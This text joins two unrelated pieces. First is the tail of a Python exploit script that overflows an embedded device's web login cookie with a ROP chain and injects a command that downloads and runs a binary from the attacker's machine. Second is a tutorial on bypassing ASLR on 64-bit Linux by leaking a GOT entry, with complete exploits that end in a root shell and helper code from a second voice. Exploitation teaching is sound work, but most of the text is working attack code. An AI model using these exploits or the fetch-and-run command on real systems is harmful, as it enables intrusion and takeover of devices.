@Param host - the ip address of the target.
@Param port - the port the webserver is running on.
@Param my_ip - The ip address of the attacking system.
'''
def exploit(host, port, my_ip):
    global DONE
    url = "http://%s:%s/goform/exeCommand" % (host, port)
    i = 0

    command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" % (my_ip, HTTPD_PORT)

    # Guess the same libc base address each time
    # (the base address and gadget offsets, shown as ****, are withheld)
    libc_base = ****
    curr_libc = libc_base + (0x7c << 12)

    system = struct.pack("<I", curr_libc + ****)

    #: pop {r3, r4, r7, pc}
    pop = struct.pack("<I", curr_libc + ****)
    #: mov r0, sp ; blx r3
    mv_r0_sp = struct.pack("<I", curr_libc + ****)

    # offset (the padding up to the saved return address) is also not given.
    password = "A" * offset
    password += pop + system + "B" * 8 + mv_r0_sp + command + ".gif"

    print "[+] Beginning brute force."
    while not DONE:
        i += 1
        print "[+] Attempt %d" % i

        # Build the request, with the malicious password field
        req = urllib2.Request(url)
        req.add_header("Cookie", "password=%s" % password)

        # The request will throw an exception when we crash the server;
        # we don't care about this, so ignore it.
        try:
            resp = urllib2.urlopen(req)
        except Exception:
            pass

        # Give the device some time to restart the process.
        time.sleep(1)

    print "[+] Exploit done"

def main():
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="host_ip", help="IP address of the target")
    parser.add_option("-p", "--port", dest="host_port", help="Port of the target's webserver")
    parser.add_option("-c", "--comp-path", dest="compiler_path", help="path to arm cross compiler")
    parser.add_option("-m", "--my-ip", dest="my_ip", help="your ip address")

    options, args = parser.parse_args()

    host_ip = options.host_ip
    host_port = options.host_port
    comp_path = options.compiler_path
    my_ip = options.my_ip

    if host_ip is None or host_port is None:
        parser.error("[x] A target ip address (-t) and port (-p) are required")

    if comp_path is None:
        parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")

    if my_ip is None:
        parser.error("[x] Please pass your ip address (-m)")

    if not compile_shell(comp_path, my_ip):
        print "[x] Exiting due to error in compiling shell"
        return -1

    httpd_thread = threading.Thread(target=start_http_server)
    httpd_thread.daemon = True
    httpd_thread.start()

    conn_listener = threading.Thread(target=threaded_listener)
    conn_listener.start()

    # Give the thread a little time to start up, and fail if it exited early
    time.sleep(3)

    if not conn_listener.is_alive():
        print "[x] Exiting due to conn_listener error"
        return -1

    exploit(host_ip, host_port, my_ip)

    conn_listener.join()

    return 0


if __name__ == '__main__':
    main()

64-bit Linux stack smashing tutorial: Part 3

It’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow-up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

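You can compile it yourself, or download the precompiled binary here. If you compile it yourself on a recent distribution, keep in mind that GCC may build position-independent executables by default. The fixed addresses used throughout this post (such as 0x4006c6) assume a non-PIE binary, so you may need to add -no-pie.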

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150-byte buffer. With ASLR on, we can’t just return to system(), as its address will be different each time the program runs. The high-level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the addresses of other library functions. libc’s base address is the difference between memset()’s address and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.
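The exploits below use 168 bytes of padding to reach the saved return address, but the post doesn’t show how that number was found. One common approach (not necessarily the author’s) is to send a non-repeating De Bruijn pattern instead of a run of “A”s. You then read the bytes that end up where the saved return address was, for example the 8 bytes at RSP when vuln()’s ret faults, and look up their position in the pattern. The function names below are our own; pwntools offers the same idea as cyclic() and cyclic_find().

```python
import string


def de_bruijn(alphabet, n):
    """Return a De Bruijn sequence: every length-n string over alphabet appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)


# 26**4 = 456976 characters, far more than the 400 bytes read() accepts.
PATTERN = de_bruijn(string.ascii_lowercase, 4)


def cyclic(length):
    """First `length` characters of the pattern, to send as input."""
    return PATTERN[:length]


def cyclic_find(chunk):
    """Offset of a 4-character chunk, e.g. the first 4 bytes found at RSP after the crash."""
    return PATTERN.find(chunk)
```

Pass cyclic_find() the bytes in the order they sit in memory (as x/s $rsp shows them), not the byte-reversed integer that x/gx prints.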

You should have a bit of an understanding of how shared libraries work in Linux. In a nutshell, with lazy binding the loader initially points the GOT entry for a library function at some code that does a slow lookup of the function’s address. Once the lookup succeeds, it overwrites the GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means that after the first call to a library function, its GOT entry points to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.
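The lazy-binding behaviour described above can be modelled in a few lines. This is a toy Python model and not how the dynamic loader is actually implemented. The “GOT” is a dictionary whose entries initially point at a resolver stub. The first call through the “PLT” patches the entry, so later calls jump straight to the function. That is why memset()’s GOT entry only holds a libc address after its first call.

```python
class ToyLazyGOT:
    """Toy model of lazy binding: GOT entries start at a resolver and get patched."""

    def __init__(self, library):
        self.library = library      # symbol name -> real function (our stand-in for libc)
        self.lookups = 0            # how many slow lookups were performed
        # Before the first call, every entry points at a resolver stub.
        self.got = {name: self._make_resolver(name) for name in library}

    def _make_resolver(self, name):
        def resolver(*args):
            self.lookups += 1                     # the slow lookup
            self.got[name] = self.library[name]   # patch the GOT entry
            return self.got[name](*args)          # then run the real function
        return resolver

    def plt_call(self, name, *args):
        # A PLT stub simply jumps through the GOT entry.
        return self.got[name](*args)
```

Calling plt_call("add", 1, 2) twice on a ToyLazyGOT({"add": lambda a, b: a + b}) performs only one lookup. After the first call, got["add"] is the real function, which mirrors the second gdb dump below.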

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive its address (0x00007f86f37335c0 in this run). We can do that by overwriting vuln()’s saved return pointer to set up a ret2plt; in this case, to write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.
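One fragile spot in poc.py is that it assumes each recv() call returns exactly one of the program’s replies. TCP is a byte stream and makes no such promise. Because vuln() echoes back exactly the bytes it read before returning into write@plt, the leak is the 8 bytes that follow the echo. A sturdier way to read it is to read up to a known delimiter and then read exact byte counts. The helper names below are our own.

```python
import socket


def recv_exact(sock, n):
    """Read exactly n bytes from sock, or raise EOFError if the peer closes first."""
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (len(data), n))
        data += chunk
    return data


def recv_until(sock, delim):
    """Read one byte at a time until delim has been received; return everything read."""
    data = b""
    while not data.endswith(delim):
        chunk = sock.recv(1)
        if not chunk:
            raise EOFError("connection closed before %r was seen" % (delim,))
        data += chunk
    return data
```

In poc.py this would become recv_until(s, b"Recv: "), then recv_exact(s, len(buf) + 1) to skip the echoed input and its newline, then recv_exact(s, 8) for memset()’s address.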

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is 0x8c5c0. Subtracting this from the leaked memset() address gives us libc’s base address.
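If you’d rather not read offsets off the screen, a small parser over readelf -s output does the same lookup. This is our own sketch. It assumes readelf’s usual column layout (Num:, Value, Size, Type, Bind, Vis, Ndx, Name) and strips the version suffix, so memset@@GLIBC_2.2.5 becomes memset. Where a symbol has several versions, it prefers the default “@@” one. The sample text is the readelf output shown above.

```python
def parse_readelf_symbols(text):
    """Map symbol names to their values (offsets) from `readelf -s` output."""
    symbols = {}
    for line in text.splitlines():
        fields = line.split()
        # Symbol rows look like: "838: 000000000008c5c0 247 FUNC GLOBAL DEFAULT 12 memset@@GLIBC_2.2.5"
        if len(fields) < 8 or not fields[0].endswith(":"):
            continue
        raw_name = fields[7]
        name = raw_name.split("@")[0]          # drop the @GLIBC_x.y / @@GLIBC_x.y suffix
        try:
            value = int(fields[1], 16)
        except ValueError:
            continue                           # e.g. the "Num: Value Size ..." header row
        # Prefer the default version (@@) when a symbol appears more than once.
        if "@@" in raw_name or name not in symbols:
            symbols[name] = value
    return symbols


READELF_SAMPLE = """\
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4
"""
```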

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.
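Here is that arithmetic worked through with numbers from this post. The leak comes from the run shown a little further down (memset() at 0x7f9d206e45c0). The offsets are the ones used in the exploit (memset at 0x8c5c0, system at 0x46640). The page-alignment check is our addition. Shared libraries are mapped at page-aligned addresses, so a computed base whose low 12 bits are not zero usually means the offset came from a different libc build.

```python
PAGE_MASK = 0xfff  # low 12 bits: the offset within a 4 KiB page


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Compute libc's load address from a leaked function address and its offset in libc.so.6."""
    base = leaked_addr - symbol_offset
    if base & PAGE_MASK:
        raise ValueError("base %#x is not page-aligned: wrong libc version?" % base)
    return base


memset_off = 0x08c5c0   # memset()'s offset in libc.so.6 (from readelf)
system_off = 0x046640   # system()'s offset in libc.so.6

leaked_memset = 0x7f9d206e45c0
libc_base = libc_base_from_leak(leaked_memset, memset_off)
system_addr = libc_base + system_off

print("libc base is %#x" % libc_base)       # libc base is 0x7f9d20658000
print("system() is at %#x" % system_addr)   # system() is at 0x7f9d2069e640
```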

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to memset@plt, which now jumps to system().
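Every call in the payload has the same five-qword shape: the pop3ret gadget, the three values it pops into RDI, RSI and RDX, and the address to return to. A small helper makes that structure explicit. This is our own refactoring, not the author’s code, and the call3() name is hypothetical. The addresses are the ones from this post’s binary and will differ for yours.

```python
import struct

POP3RET = 0x4006a1      # pop rdi; pop rsi; pop rdx; ret (inside helper())
WRITE_PLT = 0x400540
READ_PLT = 0x400580
MEMSET_PLT = 0x400570
MEMSET_GOT = 0x601030
WRITEABLE = 0x601000


def p64(value):
    """Pack an unsigned 64-bit value little-endian, as pack("<Q", ...) does."""
    return struct.pack("<Q", value)


def call3(func, rdi=0, rsi=0, rdx=0):
    """Chain one call: load RDI, RSI, RDX via the gadget, then return into func."""
    return p64(POP3RET) + p64(rdi) + p64(rsi) + p64(rdx) + p64(func)


chain = b"".join([
    call3(WRITE_PLT, 1, MEMSET_GOT, 8),   # write(1, memset@got, 8): leak
    call3(READ_PLT, 0, MEMSET_GOT, 8),    # read(0, memset@got, 8): overwrite the GOT entry
    call3(READ_PLT, 0, WRITEABLE, 8),     # read(0, 0x601000, 8): store "/bin/sh"
    call3(MEMSET_PLT, WRITEABLE),         # memset@plt, now system("/bin/sh"); RSI/RDX unused
])
payload = b"A" * 168 + chain
```

The whole payload is 328 bytes (plus the trailing newline), which comfortably fits within the 400 bytes read() accepts.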

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop args into registers (only RDI matters here)
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh\x00")           # NUL-terminated: exactly the 8 bytes read() asks for

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-privileged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.
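A single leak can often narrow down the library because ASLR randomizes libc’s base in whole pages. As a result, the low 12 bits of a leaked address equal the low 12 bits of that function’s offset. The sketch below shows the idea on a hypothetical table. Apart from memset’s offset (0x8c5c0, from this post), the build names and offsets are invented for illustration. libc-database does its matching against its own collection of symbol files, not a table like this one.

```python
PAGE_MASK = 0xfff  # ASLR shifts libc by whole 4 KiB pages, so these bits survive

# Hypothetical candidate table: build name -> memset() offset.
# Only "this-post" uses a real offset (0x8c5c0, from the readelf output in this post);
# the other entries are made up for illustration.
CANDIDATES = {
    "this-post": 0x8c5c0,
    "hypothetical-build-a": 0x8d7a0,
    "hypothetical-build-b": 0x9c2c0,
}


def matching_builds(leaked_addr, candidates):
    """Return builds whose memset() offset shares the leak's page offset (low 12 bits)."""
    low = leaked_addr & PAGE_MASK
    return sorted(name for name, off in candidates.items() if (off & PAGE_MASK) == low)
```

Several real builds can share the same low 12 bits for one function, so leaking a second function’s address is a common way to narrow the match further.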